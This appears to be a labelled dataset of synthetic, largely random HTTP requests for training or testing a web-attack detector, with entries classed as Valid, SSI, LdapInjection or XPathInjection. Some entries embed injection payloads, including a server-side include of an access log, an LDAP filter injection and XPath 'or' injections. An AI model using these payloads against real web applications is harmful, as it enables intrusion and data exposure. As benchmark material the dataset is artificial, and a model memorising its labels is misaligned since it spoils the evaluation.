Referer: http://4ixwoe.net/d7ce/gsmis/Olwnahgr.mpg
TE: trailers
Trailer: If-Unmodified-Since
User-Agent: Mozilla/0.5 (X11; U; Linux i586 4.5; nn-oa; rv:3.4.2) Gecko/49490406
UA-CPU: PowerPC
UA-Disp: 717,3860,32
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 4366x138
Via: FTP/5.0 www.sniao.gif
Transfer-Encoding: compress
Upgrade: 9atoz/8.5, joee/8.4
Warning: 844 www.lenAEuee.js "joi3ezTnghwl9ycivLao" 
X-Forwarded-For: 247.63.27.49
X-Serial-Number: 095672914255730
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

8ntkshiupqdrYSL=htotyqol raw&tjsloroo=cvtelnetslocation&0axC.WhR2U=iDCk0k

End - Id: 4767
Start - Id: 2534
class: Valid
GET /ex/neKS7yJlXIL@p3a0j3/hiui5lHdi/e-hzWmXXXN5y/syidNRC.3skTJvbKL/mN/iSGzA_L1vytBGT/52ilCrnMratst.jpeg?dl4ksel2o9uaruh=y_-F0KX2QU&nrTatducohu=ertduaju&piu=0308&sheicee3Yiqu7ep=4rw&no=mFM8HXuuL&m5o7mida8ldlr=lFIhtotSdo-&xp9HyfE=samaerr&aWGn9wperlxR=inoeninr+gT&hyprpHP=kiobjectam%3Eo%28otd3i%26mt&cr6ttuarS1ttc=Iedeaweriee2&9tglnve9hMrd=eig%26t&iesns7oud=93166 HTTP/1.0
Host: www.swuoes8ktg.org
Connection: close
Accept: audio/basic;q=0.6, audio/*
Accept-Charset: *;q=0.3
Accept-Encoding: *;q=0.2
Accept-Language: *
Cache-Control: max-stale=9702
Client-ip: 54.181.228.21
Cookie: Emizsr=dtfnc
Cookie2: $Version="1"
Date: Thu, 11 Mar 04 05:00:34 CET
ETag: "m1QNZveBLZwOiiGS"
Expect: 100-continue
From: nnxgy@Ttnc1ez.uk
If-Modified-Since: Fri, 10 Apr 09 15:59:10 UTC
If-Unmodified-Since: Tue, 14 Feb 06 20:47:45 GMT
If-Match: *
If-None-Match: "VRLes8cPh5dG1El"
If-Range: Mon, 07 May 07 19:24:19 UTC
Max-Forwards: 18
MIME-Version: 8.1
Pragma: no-cache
Proxy-Authorization: Digest uri=/tlsstete/Eaolaro/6wsnstto.shtml
Authorization: Basic ZWNvdHA6ZWVrbkVlcw==
Range: 05-
Referer: /8bl08ir/oeesbhm/nvii/cEommuin.gif
TE: deflate;q=0.0
Trailer: Referer
User-Agent: Mozilla/2.4 (compatible; uOaIesef9x; Open BSD i586; febrhFot)
UA-CPU: MIPS
UA-Disp: 284,569,32
UA-OS: Win95
UA-Color: color16
UA-Pixels: 1559x1634
Via: 1hfhr/3.2 www.ev1ee.css, FTP/2.8 www.i0suo3.png:3915
Transfer-Encoding: gzip
Upgrade: bae/3.4
Warning: 301 www.naet.js "Hsh2meee5a" "Sat, 22 Apr 06 15:10:43 UTC"
X-Forwarded-For: 8.183.220.41
X-Serial-Number: 347745233258688600
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 2534
Start - Id: 949
class: Valid
GET /eiB4oq_/syr3ofods/vpfWTcaXOtWX_2v/a0aThQFe.hj/SNWavlib@hy-50rw/fsapigapkEit/uKt/1FB-JvB/iY4bLDwC0c@-OsWX/bTp.gif?olc79gctpossty=inetcat%2Bo&otk6cp=4jottoee&epe5n5shafaee=oaD&tNnuwp0o=Exe&ahiaFpt=dhP7zRd&twzdocc=eortg&lq=d7WPsh&jC7einetertuen=+h&jg2=npassthruncisyh+gij0+t+n%3Cns HTTP/1.1
Host: 120.54.34.243:2
Connection: close
Accept: application/rtf, video/quicktime, text/*;q=0.7
Accept-Charset: *;q=0.1
Accept-Encoding: compress, compress;q=0.8, identity;q=0.0, identity, compress;q=0.2
Accept-Language: 1aoN-19r;q=0.3, tdwcaDii-6o;q=0.7, emideee-ahsf
Cache-Control: no-transform
Client-ip: 41.229.122.162
Cookie: 31=texeco5zhe0crh;obv0lEg=edi;jwe=tleisqeesT;He8latmgcrw=rhars
Cookie2: $Version="20"
Date: Tue, 27 Jan 04 18:25:26 CET
ETag: "K_p6n.wMSpcLEUb"
Expect: u3cits=algboc
From: eielNb@taT0r.com
If-Modified-Since: Sat, 27 Jun 09 16:21:33 CET
If-Unmodified-Since: Fri, 25 Aug 06 04:55:21 UTC
If-Match: ".g8rbnl-GRZIqia.i3"
If-None-Match: "Mo_Xs.rxJT0pOSRD4ItV"
If-Range: "z2YNeni4vXEG3NJjZL6A"
Max-Forwards: 9
MIME-Version: 3.0
Pragma: tH=yez
Proxy-Authorization: eohT rfphcatq=baa6t
Authorization: NTLM YWFiZXR3ZXlodGljbWFucHQ5ZWVodGRhbm56Mm9nWXZpb2tjbm5ldGR0ZXQ=
Range: 37-165,99813-448132
Referer: http://www.u0AEre.cz/hhai/oahe/zcMinE/seewd3dM/Erehut.php4
TE: trailers,gzip;q=0.8,gzip
Trailer: Connection
User-Agent: rUuJoH http://www.yemt3.be
UA-CPU: 68000
UA-Disp: 1447,7975,8
UA-OS: Win98
UA-Color: color16
UA-Pixels: 3648x172
Via: 1.1 www.2nuhsnIw.jpg
Transfer-Encoding: compress
Upgrade: ero/9.1, efreh/0.0
Warning: 918 www.mhfdsijO.css "runearpylcyatEmy" 
X-Forwarded-For: 18.21.214.141
X-Serial-Number: 5433664
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 949
Start - Id: 39603
class: SSI
GET /w7Jr5/0re0b/uTl0y/8EMuwXC/reSsesrvrr/FgKM3h/aehelnuniclOPUh/ehD2IO00Pmkc/lO_kXz-_Nt/l6PBJPH@wcP/k_zyWQ099VyeY7nwProO.shtml?ebwaxs2e3b=izr9G&Fihhs=adrbR&ETst=Ee&eospeZaosbGioc=zh9&ntdhzeN3tOrettD=%3C%21--++++%23include++virtual%3D%22%2Fvar%2Flog%2Fhttpd%2Faccess.log%22++++--%3E&ttHaodl9lTa=7416&0m3zNFGjt1oL=20664 HTTP/1.1
Host: 195.91.54.250
Connection: close
Accept: application/x-tar;q=0.6, video/mpeg
Accept-Charset: *;q=0.8
Accept-Encoding: gzip;q=0.2, deflate, gzip;q=0.4, identity
Accept-Language: *;q=0.7
Cache-Control: no-store
Client-ip: 239.19.170.214
Cookie: ioodn7=ie;0tamm=01268;xg6FEbin=tilexeclcy8sae eehlsu
Cookie2: $Version="87"
Date: Tue, 09 Nov 04 09:56:50 CET
ETag: W/"5DYXg9DnNO7-9g7IHY"
Expect: nuEdWa
From: k4wcg@aEdi7a2.de
If-Modified-Since: Thu, 01 Dec 05 06:19:50 CET
If-Unmodified-Since: Sun, 15 Apr 07 24:13:26 GMT
If-Match: *
If-None-Match: "7K6CkfYWjKe4J5vA"
If-Range: "cETdaKQjh6AHtN7Dr"
Max-Forwards: 0481
MIME-Version: 2.2
Pragma: ot3i=cigp9q
Proxy-Authorization: Basic a0k3bm9tOm5yYTg=
Authorization: NTLM aWlzaW5oY3M1cnFuY3ZVbWE0T3R0aWU2b2p0OXRpcmU5aTh3bGFiaWFoZWk=
Range: 5591-,251722-40474
Referer: /aoeNzqc.ace
TE: gzip;q=0.9,deflate;q=0.8
Trailer: Authorization
User-Agent: simRgxAis7Ii
UA-CPU: PowerPC
UA-Disp: 7073,179,8
UA-OS: Win9x
UA-Pixels: 1841x260
Via: 0.8 73.60.218.107, 0.5 www.Weiidih.htm
Transfer-Encoding: compress
Upgrade: blrDl/9.7, eie/1.2, i9hq4/7.4
Warning: 852 134.152.169.139 "ano4rrnmet8s13t" "Mon, 26 May 08 01:24:12 GMT"
X-Forwarded-For: 216.187.237.43
X-Serial-Number: 51537032626
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39603
Start - Id: 37258
class: LdapInjection
GET /uosPnei8aerhxo.exe?DH9passwdhxgiN=2&ieo=osce+&r@A2or3o=s&eNyifpo=4739171&TwdocumentQFF2WRRQ=1669&bOFtr8od=7Ee&rct0hesuyWm=462727&UN=98092&ie=cR%29%28%26%28objectClass+%3Dit9*%29&gorFm3te=mtwp&tilmyctxn=lmIs&aren2tiEe=nh&td=476036&kAEu3thtet=eteeernoi&eodteripbyOss=839 HTTP/1.1
Host: 151.114.122.138
Connection: close
Accept: */*
Accept-Charset: *;q=0.1
Accept-Encoding: *;q=0.6
Accept-Language: *
Cache-Control: max-stale=2585
Client-ip: 140.231.249.168
Cookie: ameiir=95799;cj=35yynhrn;2esrolep2pp=e9zdJ1i5+evs
Cookie2: $Version="99"
Date: Thu, 07 Oct 04 01:06:30 GMT
ETag: W/"bNc0uNmABEHOP3zCY98w"
Expect: nrsrt=lsau
From: tlclo@pOIec.be
If-Modified-Since: Thu, 07 Oct 04 12:39:52 CET
If-Unmodified-Since: Tue, 12 Feb 08 07:18:53 UTC
If-Match: "E8zx7-u6L.Qmx_StE7"
If-None-Match: *
If-Range: *
Max-Forwards: 3691
MIME-Version: 6.7
Pragma: rs2='eNldide'
Proxy-Authorization: oetuts 0iernty=iio4tep
Authorization: NTLM b21oZWVlYWN1c3NleGhnd3Vzc29sYm9paHN0bGV0ZXRzMnRsZTZuaHNsYXRp
Range: 690936-,5769-,6-
Referer: /srhIrel.tiff
TE: trailers,gzip;q=0.3,deflate
Trailer: Referer
User-Agent: toOFx.1QuP http://www.unrzkhp.uk
UA-CPU: 68000
UA-Disp: 785,4501,32
UA-OS: Win95
UA-Color: color8
UA-Pixels: 1371x144
Via: 9.9 www.eine.html, 4.7 www.iexT.jpg, 0.0 www.eteetq3.shtml
Transfer-Encoding: gzip
Upgrade: htlt/0.4
Warning: 419 57.72.62.225 "8qea3ieagcspza3ee" 
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37258
Start - Id: 7649
class: Valid
POST /eDTT-Xi4KS8Oq2F/uVqt3/si6lurRt/D5elaaecmrbnMeejh7t/zb04ubs_tdf/znscsn3stblaAann3f/aejen.shtml? HTTP/1.0
Content-Length: 309
Content-Language: iotet,h,laoE
Content-Encoding: deflate
Content-Location: /eeor/shnomcPt/4itnuye.jsp
Content-MD5: bGRycHNyRXlvNjd0SXJlNQ==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 14 May 09 14:42:59 UTC
Last-Modified: Wed, 14 Nov 07 07:15:21 CET
Host: 135.61.45.158
Connection: pteltlch
Accept: application/*;q=0.8, image/*
Accept-Charset: *
Accept-Encoding: *;q=0.2
Accept-Language: cieEbL-a3Me5tR, rtc-e7o, us-srl1;q=0.1, ts3Ya-eaest8h;q=0.3, ote99ltf-8
Cache-Control: min-fresh=19750
Client-ip: 41.206.202.253
Cookie: ohtiOhrentnt75=7
Cookie2: $Version="8"
Date: Mon, 07 Jul 08 12:14:00 CET
ETag: "p@YyIYUUlu1G@lInB"
Expect: lsge
From: pKiyxfx@wcrhasEw.biz
If-Modified-Since: Fri, 30 Apr 04 23:09:26 UTC
If-Unmodified-Since: Mon, 10 Dec 07 10:22:59 GMT
If-Match: *
If-None-Match: "MWON5WX8-93C5@W7Jq"
If-Range: Wed, 22 Jul 09 01:49:04 UTC
Max-Forwards: 7
MIME-Version: 0.6
Pragma: no-cache
Proxy-Authorization: Digest username="aornud0"
Authorization: f1nmeh R6mlL=jDaabsC
Range: -7
Referer: http://www.Ds1mR.fr/dBcra.pl
TE: trailers,deflate
Trailer: Accept
User-Agent: xlsweR2/4.4
UA-CPU: 68000
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 395x528
Via: FTP/5.0 www.waes.js, 8.9 117.59.33.204:78, FTP/8.2 www.ddeenc.shtml
Transfer-Encoding: 8eee4
Upgrade: ilArae/6.1, a3t/9.5, h6e6z/1.8
Warning: 474 10.114.95.154 "nsftoIoofrls07oahOro" 
X-Forwarded-For: 59.74.190.194
X-Serial-Number: 627742617905288485
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~

gath0kd=jaoesN&lteegenUeAi=edt2hlffrThyjan&c1=otboot.ini mbg Inimgn\ea&Vsdt9v=documentnern&swb=m2&Vwn23ssstci=erxtermohit&ocjgj=c?ttanisaLoG6hInsnechou&amwatae0dr4ibov=58&8in=5510620450&ac2=05749789&rS@5Cz6lak=(&DcAWn4rdn1et=ttobconnectprocessing-instructionth t2eeia&oJeHueeleh3sf=8&ns57cinwhiis=736816

End - Id: 7649
Start - Id: 19192
class: Valid
GET /otQC/r3dAnZ1Mj/v2/17mo/1QA.png? HTTP/1.0
Host: 89.44.148.222
Connection: keep-alive
Accept: application/rtf;q=0.9, application/postscript
Accept-Charset: iso-2022-jp;q=0.7, koi8, iso-8859-8;q=0.6, iso-8859-4, iso-2022-jp;q=0.4
Accept-Encoding: *
Accept-Language: r-eM4oisN
Cache-Control: max-age=6
Client-ip: 194.46.12.62
Cookie: aobjeiene=[ebodypseos\sol-  s;a7tc2dzUyabe=lacatiD=pstyleetdautoexec nc[maea;niyirlon4gse=sFwD0;sireiathcS0=nEd9;9nNaus=euop;aelh=eodzoarhOhqT
Cookie2: $Version="953"
Date: Sun, 16 Dec 07 22:10:18 UTC
ETag: W/"aOIaL_ZrA5hXcySozp"
Expect: hrRir
From: ToNpsn@tvfalhel.biz
If-Modified-Since: Wed, 04 Jun 08 07:26:47 CET
If-Unmodified-Since: Wed, 21 Jan 09 18:51:02 UTC
If-Match: *
If-None-Match: *
If-Range: "NRMcI.WBGMr@WMFo8oDy"
Max-Forwards: 256
MIME-Version: 4.0
Pragma: if='ahhv'
Proxy-Authorization: Basic Y2NoaDpwMW5yNWVu
Authorization: Basic MmFhYWU6bm1uc3Rta3I=
Range: 4992-36961
Referer: /iio5f/csMg7/puoctnl.pl
TE: trailers,deflate
Trailer: If-Range
User-Agent: Mozilla/1.5 (Windows; U; Windows NT 6.1; 7n-or; rv:7.6.9) Gecko/51258091
UA-CPU: 68000
UA-Disp: 246,582,8
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 203x411
Via: FTP/2.6 118.189.35.81:15259, 5.9 www.Ugctt.png:31449
Transfer-Encoding: deflate
Upgrade: deldgt/6.6
Warning: 189 59.44.75.168 "mazmEztho0mt0svdfi" 
X-Forwarded-For: 199.173.139.84
X-Serial-Number: 1861049652
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 19192
Start - Id: 10375
class: Valid
GET /otrrc3ulutnnemwTh/eeehte/yrvnDp19rZsaD/hruOqdepoAg3lwasqa6/hV3kWBX/tlY9b8gat/e.Secjr_VQpW/eT7fU.Ge/7iT.gif?c1lP6egeupdate=42&E2ARWZr.Jk=2b&evsu3h=588600940&7unionHsock_streamH8nk0=ae4lrvfc%7E%3Anc7&wnuttitmtt=qhthh1&rsole76ezeal0n=s-e0d%26nsu%5DNIg&@usr03=tctr2Tnloga5cstdinrucq0n HTTP/1.1
Host: 225.187.3.252
Connection: sseeamr
Accept: text/html;q=0.7, application/*
Accept-Charset: *;q=0.4
Accept-Encoding: identity
Accept-Language: *
Cache-Control: no-store
Client-ip: 252.120.69.113
Cookie: rstLqrLA=6325;Ms=let e;te= connect zib
Cookie2: $Version="123"
Date: Thu, 11 Aug 05 08:50:16 CET
ETag: W/"Owfp3iumNPdq3uhc9"
Expect: 100-continue
From: 5rOh@ndsafsvOY.ch
If-Modified-Since: Fri, 23 Jul 04 07:32:24 CET
If-Unmodified-Since: Sat, 15 May 04 05:52:30 CET
If-Match: *
If-None-Match: *
If-Range: Wed, 21 Oct 09 20:42:51 UTC
Max-Forwards: 4423
MIME-Version: 3.9
Pragma: eshdeo='attn8sp'
Proxy-Authorization: Digest algorithm=MD5
Authorization: Basic bm9hZ2Q6dnIybw==
Range: 3188-815,-07
Referer: /srmd.shtml
TE: trailers
Trailer: From
User-Agent: Mozilla/5.0 (compatible; Konqueror/0.7; Windows NT; Lalr3t5c)
UA-CPU: 68000
UA-Disp: 329,0706,32
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 0886x482
Via: eeat/9.6 185.204.229.67, 4.1 www.ubcigsT.css
Transfer-Encoding: compress
Upgrade: xI1sme/7.5, oor2eh/7.6, ao4ea/8.1, ian/7.9
Warning: 627 www.brdRijj.html:96201 "nn2tlyihepU" "Mon, 21 Feb 05 15:12:00 GMT"
X-Forwarded-For: 180.232.254.90
X-Serial-Number: 780593
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 10375
Start - Id: 49549
class: XPathInjection
GET /DCe1/til3iqowLu.asmx?gut2uszorenc=eul%2Fxtrn%2Fw%2Fchild%3A%3Anode%28%29%5B+++position%28%29%3D20%5D++++%7C++++le%2Ft1sg%2Fse%2Fchild%3A%3Atext%28%29%5Bposition%28%29%3D3%5D++++or++%27WidEete%27++++%3D%27&tve=fE.RY8Ut&odqih1li5Stear=30913495 HTTP/1.1
Host: 192.43.255.155:196
Connection: close
Accept: audio/x-wav
Accept-Charset: *
Accept-Encoding: compress;q=0.2
Accept-Language: hm-ao
Cache-Control: min-fresh=6
Client-ip: 77.192.67.6
Cookie: e8veaon=ur;rzn5jeylnnoini=ys29e6h|
Cookie2: $Version="745"
Date: Sun, 07 May 06 13:17:06 CET
ETag: "-RjzUPDGi0.zC78Rw@4@"
Expect: ay2otsbp=eltj
From: FTaatm@eidh.de
If-Modified-Since: Mon, 21 Jan 08 06:32:53 GMT
If-Unmodified-Since: Wed, 23 Feb 05 22:06:53 CET
If-Match: *
If-None-Match: *
If-Range: Tue, 11 Aug 09 23:27:16 GMT
Max-Forwards: 929
MIME-Version: 5.0
Pragma: no-cache
Proxy-Authorization: Digest username="93es"
Authorization: Digest nc=38EfCcD9
Range: 81084-3,1907-384053
Referer: /azu1Gr/hrohea/otzzC/oliyo.jsp
TE: trailers,trailers
Trailer: Accept-Charset
User-Agent: Mozilla/6.2 (Windows; U; Win98 6.7; ut-an; rv:3.0.7) Gecko/04876455
UA-CPU: Sparc
UA-Disp: 2924,8513,8
UA-OS: Win95
UA-Color: color32
UA-Pixels: 9192x115
Via: 2.1 www.imntat.html, 7.5 79.177.145.70
Transfer-Encoding: o1sa9k
Upgrade: os2eA/3.8, zes2/5.7, z6sc/6.6, jntir/3.8
Warning: 066 177.133.141.195 "uvomreyngrucmsS" "Mon, 08 Mar 10 06:12:12 GMT"
X-Forwarded-For: 17.226.135.24
X-Serial-Number: 5171892279457940
----: -------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 49549
Start - Id: 14731
class: Valid
GET /i8trcystgraloioebt/te6hcDmtrVdubLseme/Bu0script762HYkfz.jpeg?ntasoczlr=6611&axianlpmw=eixi%25+r&enyailoTlshsiep=UN+lusr+%3Fyporopth%25a&tHd9aEtI=Ew&uide=enV5Y6zr1G&iadNiesgaqo=%3D2le&neepidwie=0&23yoWa=hnsh6&6bg=75037&3eee0=rhfM2%40&cW9b2=dttuee&dLbdl=oKw7F2OIl HTTP/1.1
Host: 3.58.162.136
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: unYfr-cheto
Cache-Control: max-age=2
Client-ip: 232.189.121.255
Cookie: mSbXhtaccesfu=n';ulkuyreisc=omOUtalUplpeeX4;ocnn0h=aKV7m-;zrtKruJmejth=gJ79dGSrr;choo=i8dye;elxvaebanceczp=tV
Cookie2: $Version="50"
Date: Sun, 23 Dec 07 01:32:11 CET
ETag: W/"ICnEVgx7JLgYqP3"
Expect: unhenfm
From: nDone@1pntglpR.cz
If-Modified-Since: Sun, 06 May 07 24:28:32 CET
If-Unmodified-Since: Fri, 08 Oct 04 16:06:51 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 7
MIME-Version: 3.2
Pragma: p='s'
Proxy-Authorization: Digest algorithm=MD5
Authorization: Digest cnonce="IKnSxgcH"
Range: 444847-,76-,3-393
Referer: http://www.hRrPicrl.org/arriylS/heidirn.jsp
TE: gzip;q=0.1,gzip;q=0.0
Trailer: User-Agent
User-Agent: Mozilla/1.3 (compatible; aaorHtn; Win 9x; tofr; lhnvtiIl; OKeilwnd)
UA-CPU: StrongARM
UA-Disp: 733,9202,32
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 887x095
Via: HTTP/8.9 www.saOn.jpg, 3.0 www.Nenwtt.png, FTP/7.2 www.a3Nt.tiff:7515
Transfer-Encoding: gzip
Upgrade: wka/5.4, itcal/5.7
Warning: 444 41.18.184.85 "fLhaoeeTgtaiizTniaz" 
X-Forwarded-For: 99.254.129.225
X-Serial-Number: 5935364150091795
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 14731
Start - Id: 48963
class: XPathInjection
GET /bHN/tha255/oOFU2MVrB/tKtvswgd.exe?iablo5rhheyiR=0dSFyVSETYD&hf4e=tggao6Fx90&lHEzD5R70eerg=stswr%2Flformiplto%2B+stdin%2Fn&oltaalgnt7o=ssoFl&oa4E45=1noylYu%40fsame&Thaugasa=741+++++or++++trjral%2Fn5%2Fwte%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D24%5D+or+48599%3D&gDTJPO=6140064&4BKa6xml3m=ee%7EPSdi&VAkxvBcvboot.inis=791 HTTP/1.0
Host: www.ebTmds7.it
Connection: close
Accept: application/rtf;q=0.5, application/zip;q=0.0
Accept-Charset: windows-1254, iso-8859-5;q=0.0
Accept-Encoding: 
Accept-Language: 5e-rinm;q=0.1, ml-cito6eBj, F-bLrr;q=0.0
Cache-Control: no-store
Client-ip: 196.26.247.32
Cookie: _0aLRL219=tMi-2DVCVjv.;da=objectetds;eihcont=54JsDqRZUocG;-@passthrus9s=6
Cookie2: $Version="39"
Date: Tue, 04 Aug 09 11:56:29 CET
ETag: "FUkp6cY6gug6IFvU"
Expect: dPr4e6iA
From: aaee5oT@0lekntq.de
If-Modified-Since: Sun, 27 Jul 08 10:53:53 GMT
If-Unmodified-Since: Thu, 21 Jul 05 16:08:57 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 477
MIME-Version: 6.3
Pragma: 8sqe=13nrb
Proxy-Authorization: 7ryrer l7Fsei=9ums
Authorization: Basic aHNoYmNkOm5mZUllZWhl
Range: 23-,057-,45-
Referer: /0en2il9b/yi3q.mpg
TE: trailers,chunked;q=0.8,chunked;q=0.4
Trailer: Accept-Encoding
User-Agent: rCCKTQ http://www.b2poro.uk
UA-CPU: 68000
UA-Disp: 7135,390,16
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 7333x919
Via: HTTP/3.4 www.otitnae.jpeg, 9.5 www.hleheOth.tiff
Transfer-Encoding: topOi
Upgrade: ridti/5.6, m2mn/9.7, 5cse/3.2, eaEos/5.1
Warning: 932 www.wwas6l.css "3kbciaaakjefi5ciec" "Tue, 30 May 06 18:44:25 CET"
X-Forwarded-For: 235.34.139.147
X-Serial-Number: 544350626543951868
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 48963
Start - Id: 29134
class: Valid
GET /GFk.png? HTTP/1.1
Host: 8.229.9.47:27
Connection: 2fc4Ih
Accept: */*;q=0.4
Accept-Charset: iso-8859-5;q=0.6, iso-8859-8-i, x-mac-chinesesimp
Accept-Encoding: *
Accept-Language: ci-4Alb;q=0.4, gwhfomh-yeoqrjsi, 8lEdMaN-uoeuel, 8ou-nabr;q=0.4, sohnd-iipa
Cache-Control: max-age=2
Client-ip: 186.234.179.68
Cookie: nitserxSity=erep
Cookie2: $Version="0"
Date: Sun, 20 Dec 09 11:50:09 CET
ETag: W/"5tyi6i@@GVLMdq_M"
Expect: 9wpt=Fls4a
From: 9tlsAera@gi2n.org
If-Modified-Since: Thu, 13 Apr 06 04:15:59 UTC
If-Unmodified-Since: Fri, 01 Jan 10 23:46:52 UTC
If-Match: *
If-None-Match: *
If-Range: Fri, 13 Mar 09 16:00:28 GMT
Max-Forwards: 3473
MIME-Version: 6.1
Pragma: De3mrh='enioessS'
Proxy-Authorization: Basic ZWVhaHJBZjc6b2Vzbw==
Authorization: Digest uri=http://www.dnkSuN.uk/nt58rt/xrnaaid.doc
Range: -6
Referer: /w8gpAu/sela/tcqrnm/o3ntess.png
TE: deflate;q=0.1
Trailer: User-Agent
User-Agent: Mozilla/5.0 (compatible; MSIE 0.5; Open BSD i586; seetttA; othlaN3)
UA-CPU: MIPS
UA-Disp: 2948,2319,8
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 466x304
Via: HTTP/2.8 167.173.188.174
Transfer-Encoding: compress
Upgrade: ec9/9.0, tdi/9.7, rri/1.9, iedD92/0.3, piyrsf/0.2
Warning: 235 www.aliaS.js "ienttr9bl" 
X-Forwarded-For: 15.219.134.176
X-Serial-Number: 1881707
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 29134
Start - Id: 10217
class: Valid
GET /l.N/zeesea/m69-fADj-Hr8nU5.jpg?UFl2iframe.=rknpAUzt&eoKGPACackvb=wy&IHNIUcEJX0@j=369&Ui=6791&8KLfCfW3T5Sscript=3331&hott4=tBebt02a4i&aa=reoo6asswo&2bodym4GpositionwinntrojM=140&c5bery1=a3earnranre1onii7 HTTP/1.1
Host: www.5sclhor.cz
Connection: gcRoiIne
Accept: application/x-tar;q=0.6
Accept-Charset: *;q=0.4
Accept-Encoding: identity;q=0.6, compress
Accept-Language: *
Cache-Control: no-transform
Client-ip: 148.84.86.46
Cookie: Mii=73;8fDaraett5go=tOt;hqhDrsdmhgcrc=aBSbTCmR-ScR
Cookie2: $Version="6"
Date: Thu, 01 Apr 10 01:47:13 UTC
ETag: "IP5xSEB5i48TBsbyt"
Expect: oeeSt
From: wtrHit2e@1hInbeFrp.de
If-Modified-Since: Sat, 19 Sep 09 01:37:48 UTC
If-Unmodified-Since: Fri, 10 Mar 06 24:10:36 UTC
If-Match: "UrdhneqJv63WoNj6"
If-None-Match: "_bsKl7H4E7E@t-uKSH"
If-Range: *
Max-Forwards: 7
MIME-Version: 9.1
Pragma: no-cache
Proxy-Authorization: NTLM bG9leGlSbnBrdWVuMVhoZXJtMGR4blNlbHRlbHdsYXRpMHNocmlvZDlwZG52em8=
Authorization: hR2kr 44ooj=fGiihvsr
Range: 399-,-5952
Referer: http://www.ruea5n.com/i5eRnan/ettim/4tnsiuXS/bn9ttd8t/utvdo.mdb
TE: trailers,trailers,trailers
Trailer: Transfer-Encoding
User-Agent: t6m3omstfu (n6@wHj; r@QoNtbQ7p; b9zy@9; y5OS91l6; nDRiBLqI)
UA-CPU: MIPS
UA-Disp: 6635,0350,16
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 099x017
Via: 9.3 91.13.216.48:5, 3.1 234.140.17.96, FTP/8.0 232.80.94.192
Transfer-Encoding: a7fa
Upgrade: hrn4th/8.3, 9zah/4.6, toatm/3.3
Warning: 637 www.hs6E.png "t1aojshwaSSaeBsobih" "Fri, 24 Jun 05 14:32:42 CET"
X-Forwarded-For: 119.252.21.3
X-Serial-Number: 9799950017867099
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 10217
Start - Id: 23664
class: Valid
GET /nsgewnmfi/wM/dOnNhC9FAt/rntah6l743e6Wrael74/oak/enireqnwlhg/zMY6Ri/nrm4EaidrheB/nloovIintlonive6ebr/soifu8z@Od27SWJzhz.v/s36z_.exe?uooSlf8iB=iXMZySKfFboa&UuaNKr.5objectQ=erra%3Asanhwx&oLlve5rs0trrod=toeenhy4otlrC&nOr=ds2positionrts3anejfns&edeoaqeif=o%25echorh&gssairnnds411=77&4a@@hZKacb=5b3i&jcczm9t=mnyt HTTP/1.0
Host: 226.82.205.164
Connection: keep-alive
Accept: */*;q=0.9
Accept-Charset: windows-1255;q=0.7, cp-932, iso-2022-kr;q=0.9, x-mac-cyrillic;q=0.1, iso-2022-kr;q=0.1
Accept-Encoding: 
Accept-Language: Coce-dtro, idRh-ceo, staeoi-gOcr6or, h7-aYcxNeen;q=0.9, eymshd-o4;q=0.1
Cache-Control: only-if-cached
Client-ip: 35.46.231.160
Cookie: nrog=sti;elmitoe5yuhr=uooande:;oArTse=172
Cookie2: $Version="07"
Date: Thu, 11 Nov 04 06:18:16 UTC
ETag: W/"hJnbxoEublZENg7E"
Expect: gdT8cnm=al6eSirf;6aaEe
From: sdRsrbm@8Ksyhxnv6C.uk
If-Modified-Since: Thu, 01 Apr 04 06:44:38 UTC
If-Unmodified-Since: Wed, 15 Mar 06 07:56:02 CET
If-Match: "J-8gVRMeWSfI.GtN9s"
If-None-Match: *
If-Range: Sat, 29 Jul 06 19:22:00 UTC
Max-Forwards: 526
MIME-Version: 3.7
Pragma: no-cache
Proxy-Authorization: Basic ZGFhaGJsOmh0MmRk
Authorization: Digest nc=c7Ace8E0
Range: -672118
Referer: http://casc.ch/teye/dtoqals.mpeg
TE: gzip;q=0.5
Trailer: Warning
User-Agent: rz1aheeSn
UA-CPU: 68000
UA-Disp: 488,135,32
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 961x2992
Via: 2.1 www.atgete.gif:8803, 1.3 110.57.140.164
Transfer-Encoding: Nmniz
Upgrade: lfn/6.1, EejE/5.5, dt2/9.5
Warning: 106 www.otao9u.png "uedtUhed0asbe" "Sun, 20 May 07 15:25:06 CET"
X-Forwarded-For: 102.8.0.254
X-Serial-Number: 13224
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 23664
Start - Id: 7008
